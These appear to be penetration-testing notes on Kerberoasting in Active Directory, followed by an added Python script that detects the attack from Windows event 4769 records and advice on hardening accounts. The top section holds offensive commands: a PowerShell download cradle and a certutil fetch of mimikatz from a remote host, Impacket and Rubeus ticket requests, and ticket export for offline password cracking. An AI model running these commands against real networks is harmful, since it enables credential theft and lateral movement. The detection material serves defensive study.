AD Lateral Movement

Obtaining Kerberos tickets with Rubeus

## Impacket method

```
impacket-GetUserSPNs controller.local/Machine1:Password1 -dc-ip 10.10.10.111 -request
```

## Mimikatz method

```
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.111/GetUserSPNs.ps1')
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/xor-app23.xor.com:1433"
certutil.exe -f -urlcache -split http://10.10.10.111/mimikatz.exe
.\mimikatz.exe 'kerberos::list /export' exit
```


```
C:\xampp\htdocs\books\myFiles\backups>Rubeus.exe kerberoast /outfile:hash.txt

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : xor.com
[*] Searching path 'LDAP://xor-dc01.xor.com/DC=xor,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 3


[*] SamAccountName         : ExchangeService
[*] DistinguishedName      : CN=ExchangeService,OU=ServiceAccounts,OU=xorUsr,DC=xor,DC=com
[*] ServicePrincipalName   : HTTP/ExchangeService.xor.com
[*] PwdLastSet             : 5/20/2019 1:07:08 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\xampp\htdocs\books\myFiles\backups\hash.txt
```
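The `Supported ETypes : RC4_HMAC_DEFAULT` line in the Rubeus output is the defender's hook: every service ticket these tools request lands on the domain controller as a Windows Security event 4769, and a burst of RC4 (`TicketEncryptionType 0x17`) service-ticket requests for several non-machine SPN accounts from one principal is the classic Kerberoasting signature. The following detection script is an added example, not part of the original notes and not code from Rubeus or Impacket; the 4769 records it processes are constructed, and the account names, timestamps, window size and threshold are assumptions.

```python
"""Flag likely Kerberoasting from Windows Security event 4769 records.

Added example; the events below are constructed, not real logs. Field
names mirror the 4769 schema (TargetUserName, ServiceName,
TicketEncryptionType, Status) but are shortened for readability.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17        # TicketEncryptionType for RC4-HMAC in event 4769
STATUS_SUCCESS = 0x0   # Status 0x0 means the TGS-REQ was granted

# Constructed sample: one requester pulls RC4 tickets for three service
# accounts within seconds (roast pattern); a machine account, an AES
# ticket and a lone legacy RC4 request are the normal background noise.
SAMPLE_EVENTS = [
    {"time": "2019-05-20T13:10:01", "event_id": 4769, "account": "Machine1@XOR.COM",
     "service": "ExchangeService", "etype": 0x17, "status": 0x0, "ip": "10.10.10.50"},
    {"time": "2019-05-20T13:10:03", "event_id": 4769, "account": "Machine1@XOR.COM",
     "service": "MSSQLSvc", "etype": 0x17, "status": 0x0, "ip": "10.10.10.50"},
    {"time": "2019-05-20T13:10:05", "event_id": 4769, "account": "Machine1@XOR.COM",
     "service": "HTTPSvc", "etype": 0x17, "status": 0x0, "ip": "10.10.10.50"},
    {"time": "2019-05-20T13:10:06", "event_id": 4769, "account": "Machine1@XOR.COM",
     "service": "XOR-APP23$", "etype": 0x17, "status": 0x0, "ip": "10.10.10.50"},
    {"time": "2019-05-20T13:30:00", "event_id": 4769, "account": "jdoe@XOR.COM",
     "service": "ExchangeService", "etype": 0x12, "status": 0x0, "ip": "10.10.10.77"},
    {"time": "2019-05-20T13:31:00", "event_id": 4769, "account": "jdoe@XOR.COM",
     "service": "MSSQLSvc", "etype": 0x17, "status": 0x0, "ip": "10.10.10.77"},
    {"time": "2019-05-20T14:30:00", "event_id": 4769, "account": "Machine1@XOR.COM",
     "service": "FileSvc", "etype": 0x17, "status": 0x0, "ip": "10.10.10.50"},
]


def is_roast_candidate(ev):
    """True for a granted RC4 service ticket to a non-machine, non-krbtgt account.

    Machine accounts (trailing '$') and krbtgt are excluded for the same
    reason the Rubeus LDAP filter above excludes krbtgt: their tickets are
    not the ones an attacker crack offline.
    """
    if ev["event_id"] != 4769 or ev["status"] != STATUS_SUCCESS:
        return False
    if ev["etype"] != RC4_HMAC:
        return False
    svc = ev["service"]
    return not svc.endswith("$") and svc.lower() != "krbtgt"


def detect_kerberoasting(events, window_seconds=300, min_services=2):
    """Return {account: sorted services} for requesters that asked for RC4
    tickets to at least `min_services` distinct SPN accounts inside any
    `window_seconds` window. A single legacy RC4 request is not flagged."""
    by_account = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            t = datetime.fromisoformat(ev["time"])
            by_account[ev["account"]].append((t, ev["service"]))

    window = timedelta(seconds=window_seconds)
    alerts = {}
    for account, reqs in by_account.items():
        reqs.sort()
        flagged = set()
        for t, _ in reqs:
            # Distinct services requested in the trailing window ending at t.
            in_window = {svc for ts, svc in reqs if t - window <= ts <= t}
            if len(in_window) >= min_services:
                flagged |= in_window
        if flagged:
            alerts[account] = sorted(flagged)
    return alerts


if __name__ == "__main__":
    for account, services in detect_kerberoasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {account}: {', '.join(services)}")
```

On the constructed input only `Machine1@XOR.COM` is reported, for the three tickets pulled within five seconds; the `FileSvc` request an hour later and `jdoe`'s single RC4 ticket stay below the threshold. The durable fix for the accounts Rubeus lists is to move them off `RC4_HMAC_DEFAULT` (AES-only `msDS-SupportedEncryptionTypes`) and give them long random passwords, after which a 0x17 request for such an account is itself worth an alert.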

AS-REP

SHARPHOUND
